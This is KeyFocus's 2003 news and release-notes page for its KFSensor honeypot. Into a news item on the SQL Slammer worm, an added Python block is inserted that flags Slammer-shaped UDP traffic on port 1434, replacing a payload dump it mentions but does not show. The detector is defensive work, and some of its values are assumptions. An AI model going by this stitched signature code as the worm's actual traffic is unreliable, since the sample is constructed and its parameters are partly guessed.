The honeypot approach to security has a number of key advantages. It produces a much lower number of false positive alerts and provides far more detail on an attack than other forms of security.

KFSensor has been developed from the ground up, as a production honeypot system, dedicated to the task of intrusion detection. Used as part of a comprehensive security strategy, KFSensor adds an additional layer of protection to detect security breaches that may not be picked up by other means.

KFSensor is a second generation honeypot application for Windows NT4/2000/XP/2003. Designed to be easy to configure and maintain, it provides advanced honeypot detection to organizations that have chosen not to adopt this emerging security technology up to now.

About KeyFocus
KeyFocus Ltd. is a software company dedicated to developing network and system security software. KeyFocus was one of the first companies to recognize the potential of honeypot technology to move beyond a research tool and become a valuable production system, which could complement and enhance an organization's existing security infrastructure. KeyFocus Ltd. is privately funded and based in London, England.

KFSensor version 2.0 Release Notes

  • 31 Oct 2003
New features
Improved Manual
  • New KFSensor Administration Guide
External Console Applications
  • Use languages like C, Perl and Python
  • Operation and logging compatible with the built in Sim Servers
  • Compatible with scripts written for Honeyd
  • Sample scripts included
External Alerts
  • Process all or selected alerts using a custom external application
  • Launch an immediate port scan on the IP address of a visitor to the honeypot
  • Create your own custom event log file
  • Send alerts to a third-party application
  • Use languages like C, Perl and Python
NBT Sim Std Servers
  • KFSensor can emulate Microsoft's NetBIOS and SMB/CIFS services
  • Insecure file shares are among the most commonly exploited and potentially most dangerous security vulnerabilities
  • Decodes NBT and SMB packets and logs them in a human readable form
  • Allows worms to upload malicious code to a secure area, for analysis
  • All four NBT services emulated
    • NBT Name Service - UDP 137
    • NBT Datagram Service - UDP 138
    • NBT Session Service - TCP 139
    • NBT SMB Raw - TCP 445
Database Log Enhancement
  • KFSensor now has the option to save binary data, encoded as text, into a long char or Memo field in the database, which can make for easier external analysis of the database.

Information Security Magazine review

  • 20 Oct 2003

Information Security Magazine has reviewed KFSensor in its October edition.

Read the review at Information Security's web site

KeyFocus launches version 1.4 of KFSensor, its honeypot based intrusion detection system.

  • 11 Jul 2003

For Immediate Release

KeyFocus, an Internet security provider, launches version 1.4 of KFSensor, its honeypot based intrusion detection system.

KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans.

The system is highly configurable and features detailed logging, analysis of attacks, multiple alerting mechanisms and sophisticated emulations of standard system services. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.

The honeypot approach to security has a number of key advantages. It produces a much lower number of false positive alerts and provides far more detail on an attack than other forms of security.

KFSensor has been developed from the ground up, as a production honeypot system, dedicated to the task of intrusion detection. Used as part of a comprehensive security strategy, KFSensor adds an additional layer of protection to detect security breaches that may not be picked up by other means.

KFSensor is a second generation honeypot application for Windows 98/Me/NT4/2000/XP/2003. Designed to be easy to configure and maintain, it provides advanced honeypot detection to organizations that have chosen not to adopt this emerging security technology up to now.

About KeyFocus
KeyFocus Ltd. is a software company dedicated to developing network and system security software. KeyFocus was one of the first companies to recognize the potential of honeypot technology to move beyond a research tool and become a valuable production system, which could complement and enhance an organization’s existing security infrastructure. KeyFocus Ltd. is privately funded and based in London, England.

KFSensor, version 1.4.0 released

  • 7 Jul 2003
New features
  • SysLog Alerts
    KFSensor can now send alerts to a UNIX SysLog server.
  • Event Log Alerts
    KFSensor can now send alerts to the Windows Event Log.
  • New type of Sim Std Server - Terminal Server
    KFSensor now emulates a Microsoft Terminal Server.

KFSensor, version 1.3.0 released

  • 4 Jun 2003
New features
  • High Integrity Version
    KFSensor now contains two versions. The high integrity version has certain potential higher risk features removed.
  • High Security Configuration
    Detailed instructions have been included in the manual on how to configure the KFSensor installation for maximum security.
  • Edit Log Path
    The directory in which KFSensor stores its log files can now be changed.
  • Edit Admin Port
    You can now change the port on which the KFSensor monitor and server communicate.
  • New type of Sim Std Server - VNC
    KFSensor now emulates a VNC server.

KFSensor, version 1.2.0 released

  • 13 May 2003
New features
  • More standard simulated servers
    • HTTP Simulated Server - Sophisticated emulation of Microsoft's IIS web server
    • FTP Simulated Server - File Transfer Protocol emulation
    • POP3 Simulated Server - Post Office Protocol emulation
  • Other new features
    • Dynamic binding - It is now possible to bind to dynamically assigned IP addresses
    • Improved tool bar - More actions on the tool bar for easier access to functionality


KFSensor, version 1.0.4 released

  • 19 Mar 2003
Changes
  • Alert EMails
    In addition to recording events in the event log and providing audio and system tray alerts, KFSensor is able to send alerts by email.
  • New type of Sim Std Server - Telnet
    KFSensor now emulates the Telnet protocol.
  • New type of Sim Std Server - Relay
    A Relay server can be used to allow visitors to access a service running on another machine.
  • New feature for the SMTP Sim Std Server
    The SMTP Sim Std Server can now optionally relay a limited number of emails. This is needed to trap spammers.


KFSensor, version 1.0.3 released

  • 28 Feb 2003
Changes
  • Denial Of Service Attack Protection
    The KFSensor Server is very fast at responding to visitors.
    On a reasonably quick internet connection the server can easily handle several million requests per hour. This would not pose a problem for the server itself, but it would cause the logs to grow very large.
    To prevent a hacker from generating an excessive number of events, KFSensor implements various limits on the amount of traffic it will accept.
  • New type of Sim Std Server
    A Sim Standard Server is a sophisticated emulation of a real server.
    The level of deception is much higher than with a Sim Banner and provides much more detailed information for analyzing an attack.
    The first Sim Std Server introduced in this release is the SMTP emulation.
  • Server Domain Name, added to Scenario
    This is the domain name used to identify the server to a visitor. It is used in various protocols such as SMTP. This could be the real domain name of the machine or a fictitious one.
  • Bug Fix - Monitor Error
    On starting up KFSensor, a few monitor errors could be logged. This has now been fixed.


KFSensor, version 1.0.2 released

  • 13 Feb 2003
Changes
  • Load Events
    KFSensor can now display events from any time in the past.
  • Hide Events
    Events can now be hidden based on date or severity level.
  • Export
    Writes event details to a file in one of these formats: HTML, XML, TSV or CSV.
  • Event Severity
    All events now have a severity level of low, medium or high. These are color coded in the events view and generate different types of alerts.
  • Improved reliability
    The reliability of the link between the monitor and the server has been improved.

SQL Slammer Worm

  • 26 Jan 2003

A new worm that attacks and exploits a vulnerability in Microsoft's SQL Server rapidly infected thousands of machines after it was launched on 25 Jan 2003.

The worm spreads by sending a UDP message to port 1434, which causes a buffer overflow. The message is only 376 bytes long.

We are picking up on average 5 of these attacks an hour.

The SQL Slammer Worm payload looks like this:


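The worm traffic described above, as an added example that is not KFSensor's or KeyFocus's own code: a small Python check that a UDP honeypot listener on port 1434 could apply to each datagram, flagging the Slammer shape (376-byte payload, leading 0x04, long run of 0x01 bytes) while passing a normal one-byte SQL Server Resolution Service query. The sample datagrams are constructed and contain none of the worm's code; the PAD_RUN threshold and the 0x02 query byte (the SSRP broadcast request type, from the public protocol description) are assumptions not taken from the page.

```python
import struct

SSRP_PORT = 1434     # SQL Server Resolution Service port the worm targets
SLAMMER_LEN = 376    # payload size reported in the news item above
SLAMMER_REQ = 0x04   # leading request byte shown in the captured dump
PAD_RUN = 32         # require at least this many 0x01 bytes after it (assumption; the real run is longer)

def build_udp(src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Assemble a raw UDP datagram; checksum 0 means 'not computed' and is legal over IPv4."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload

def parse_udp(datagram: bytes) -> tuple:
    """Split a UDP datagram into (src_port, dst_port, payload); ValueError if malformed."""
    if len(datagram) < 8:
        raise ValueError("truncated UDP header")
    src, dst, length, _csum = struct.unpack("!HHHH", datagram[:8])
    if length != len(datagram):
        raise ValueError("UDP length field disagrees with datagram size")
    return src, dst, datagram[8:]

def classify_ssrp(dst_port: int, payload: bytes) -> str:
    """'slammer' for a Slammer-shaped datagram, 'ssrp' for other traffic to 1434, else 'other'."""
    if dst_port != SSRP_PORT or not payload:
        return "other"
    if (len(payload) == SLAMMER_LEN and payload[0] == SLAMMER_REQ
            and payload[1:1 + PAD_RUN] == b"\x01" * PAD_RUN):
        return "slammer"
    return "ssrp"

def classify_datagram(datagram: bytes) -> str:
    """Classify a raw datagram, reporting 'malformed' instead of raising so a sensor loop keeps running."""
    try:
        _src, dst, payload = parse_udp(datagram)
    except ValueError:
        return "malformed"
    return classify_ssrp(dst, payload)

# Constructed samples: the Slammer-shaped one keeps only the shape (length, request byte,
# padding) and fills the remainder with a neutral byte.
SLAMMER_SHAPED = bytes([SLAMMER_REQ]) + b"\x01" * 96 + b"X" * (SLAMMER_LEN - 97)
SSRP_PING = b"\x02"   # one-byte SSRP broadcast query (assumed value), normal on this port

if __name__ == "__main__":
    for name, dg in [("slammer-shaped", build_udp(1025, SSRP_PORT, SLAMMER_SHAPED)),
                     ("ssrp-ping", build_udp(1026, SSRP_PORT, SSRP_PING)),
                     ("short", b"\x00\x01")]:
        print(name, "->", classify_datagram(dg))
```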

KeyFocus Releases Intrusion Detection System

  • 24 Jan 2003
London, UK
January 24, 2003 - KeyFocus Ltd. announces the beta release of KFSensor, an Intrusion Detection System (IDS).

About KFSensor
KFSensor is a host based Intrusion Detection System (IDS). It acts as a honeypot to attract and detect hackers by simulating vulnerable system services and trojans. The system is highly configurable and features detailed logging, analysis of attacks and security alerts. This approach complements other forms of security and adds another defense against the growing security threat faced by all organizations.

Copyright © 2003-2016 KeyFocus Ltd. All rights reserved.